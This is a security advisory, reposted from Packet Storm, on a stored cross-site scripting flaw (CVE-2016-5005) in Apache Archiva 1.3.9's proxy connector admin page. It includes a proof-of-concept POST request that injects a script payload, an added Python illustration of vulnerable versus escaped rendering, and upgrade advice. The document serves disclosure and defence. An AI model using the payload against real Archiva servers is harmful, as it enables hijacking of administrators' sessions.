Apache Archiva 1.3.9 Cross Site Scripting

Packet Storm (PACKETSTORM:137870), published Jul 12, 2016
Author: Julien Ahrens
Source: packetstormsecurity.com
EPSS: 0.008 (82.1st percentile)

RCE Security Advisory  
https://www.rcesecurity.com  
  
  
1. ADVISORY INFORMATION  
=======================  
Product: Apache Archiva  
Vendor URL: https://archiva.apache.org  
Type: Cross-Site Scripting [CWE-79]  
Date found: 2016-05-31  
Date published: 2016-07-11  
CVSSv3 Score: 5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)  
CVE: CVE-2016-5005  
  
  
2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.  
  
  
3. VERSIONS AFFECTED  
====================  
Apache Archiva v1.3.9  
older versions may be affected too.  
  
  
4. INTRODUCTION  
===============  
Apache Archiva™ is an extensible repository management software that helps  
taking care of your own personal or enterprise-wide build artifact  
repository. It is the perfect companion for build tools such as Maven,  
Continuum, and ANT.  
  
(from the vendor's homepage)  
  
  
5. VULNERABILITY DETAILS  
========================  
The script "/archiva/admin/addProxyConnector_commit.action" is vulnerable to  
an authenticated persistent Cross-Site Scripting vulnerability when user-  
supplied input to the HTTP POST parameter "connector.sourceRepoId" is  
processed by the web application. Since the application does not properly  
validate and sanitize this parameter, it is possible to place arbitrary  
script code permanently on the "Administration - Proxy Connectors" page as  
well as on the "Admin: Delete Proxy Connector" page.  
  
The following Proof-of-Concept triggers this vulnerability and adds a new  
proxy connector called "XSS<script>alert(document.cookie)</script>":  
  
POST /archiva/admin/addProxyConnector_commit.action HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Cookie: JSESSIONID=1vabu6a1f9wye; rbkSignon=7574033ea6d44b4a9722cfa53a7b4001; _ga=GA1.2.1956020753.1461333249; __utma=86544839.1956020753.1461333249.1461575160.1461575160.1; __utmz=86544839.1461575160.1.1.utmcsr=premium_main|utmccn=(not%20set)|utmcmd=(not%20set)  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 567  
  
pattern=&connector.order=0&connector.proxyId=%28direct+connection%29&connector.sourceRepoId=XSS<script>alert(document.cookie)</script>&connector.targetRepoId=com.springsource.repository.bundles.external&connector.policies%5B%27propagate-errors-on-update%27%5D=always&connector.policies%5B%27cache-failures%27%5D=no&connector.policies%5B%27releases%27%5D=always&connector.policies%5B%27propagate-errors%27%5D=stop&connector.policies%5B%27checksum%27%5D=fail&connector.policies%5B%27snapshots%27%5D=always&propertyKey=&propertyValue=&blackListPattern=&whiteListPattern=  
  
The payload is then rendered unencoded on the "Administration - Proxy Connectors" page:  
  
<div class="managedRepo">  
<img src="/archiva/images/archiva-splat-32.gif">  
<p class="id">XSS<script>alert(document.cookie)</script></p>  
<p class="name"></p>  
</div>  
  
And on the "Admin: Delete Proxy Connector" page:  
  
<p>  
Are you sure you want to delete proxy connector <code>[  
XSS<script>alert(document.cookie)</script> ,  
maven2-repository.dev.java.net ]</code> ?  
</p>  
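The root cause described above is that the "connector.sourceRepoId" value is written into the page markup without HTML entity encoding. The following Python snippet is an added illustration, not code from the advisory or from the Archiva project: it reproduces the unencoded rendering of the "managedRepo" block shown above, places the hardened version (output encoding with `html.escape`) beside it, and adds an allow-list check for repository identifiers as defence in depth. The identifier pattern `REPO_ID_RE` is an assumption chosen for this example, not a rule taken from Archiva.

```python
import html
import re

# Payload exactly as used in the advisory's proof-of-concept.
POC_SOURCE_REPO_ID = "XSS<script>alert(document.cookie)</script>"

# Assumption for this example (not an Archiva rule): repository ids are
# limited to letters, digits, dots, underscores and dashes, max 64 chars.
REPO_ID_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def render_connector_vulnerable(source_repo_id: str, name: str = "") -> str:
    """Mirror the advisory's vulnerable markup: user input is concatenated
    straight into the HTML, so a value containing <script> executes."""
    return (
        '<div class="managedRepo">'
        '<img src="/archiva/images/archiva-splat-32.gif">'
        f'<p class="id">{source_repo_id}</p>'
        f'<p class="name">{name}</p>'
        "</div>"
    )


def render_connector_hardened(source_repo_id: str, name: str = "") -> str:
    """Same markup, but every user-controlled value is entity-encoded for the
    HTML text context at output time; '<' becomes '&lt;' and no tag survives."""
    return (
        '<div class="managedRepo">'
        '<img src="/archiva/images/archiva-splat-32.gif">'
        f'<p class="id">{html.escape(source_repo_id, quote=True)}</p>'
        f'<p class="name">{html.escape(name, quote=True)}</p>'
        "</div>"
    )


def validate_repo_id(source_repo_id: str) -> bool:
    """Defence in depth: reject identifiers outside the allow-list before they
    are stored, so the payload never reaches the database in the first place."""
    return REPO_ID_RE.fullmatch(source_repo_id) is not None


def contains_live_script(fragment: str) -> bool:
    """Crude regression check: does the rendered HTML still carry a <script tag?"""
    return re.search(r"<script\b", fragment, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("input accepted by allow-list:", validate_repo_id(POC_SOURCE_REPO_ID))
    print("vulnerable:", render_connector_vulnerable(POC_SOURCE_REPO_ID))
    print("hardened:  ", render_connector_hardened(POC_SOURCE_REPO_ID))
```

Output encoding at the point of rendering is the fix that actually closes the bug; the allow-list only narrows the attack surface and would not help a page that displays free-form text. In a JSP/Struts application such as Archiva the equivalent is escaping every property in the view (for example with the OWASP Java Encoder or the tag library's escaping attributes) rather than trusting stored values.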
  
  
6. RISK  
=======  
To successfully exploit this vulnerability, a user with administrative  
rights must trick another authenticated user with administrative rights  
into visiting one of the affected pages. Since this scenario is quite unlikely,  
the attack likelihood can be increased by combining this vulnerability  
with the Cross-Site Request Forgery vulnerability described in  
RCESEC-2016-003 (CVE-2016-4469).  
  
The vulnerability allows remote attackers to permanently embed arbitrary  
script code into the context of the Apache Archiva administrative backend  
interface, which offers a wide range of possible attacks such as stealing  
cookies or attacking the browser and its components of a user visiting the  
page.  
  
  
7. SOLUTION  
===========  
Upgrade/Migrate to Apache Archiva 2.2.1  
  
  
8. REPORT TIMELINE  
==================  
2016-05-31: Discovery of the vulnerability  
2016-05-31: Notified vendor via public security mail address  
2016-06-06: No response, sent out another notification  
2016-06-10: Vendor states that this version is out of support  
2016-07-07: Vendor assigns CVE-2016-5005  
2016-07-11: Advisory released  
  
  
9. REFERENCES  
=============  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5005  
  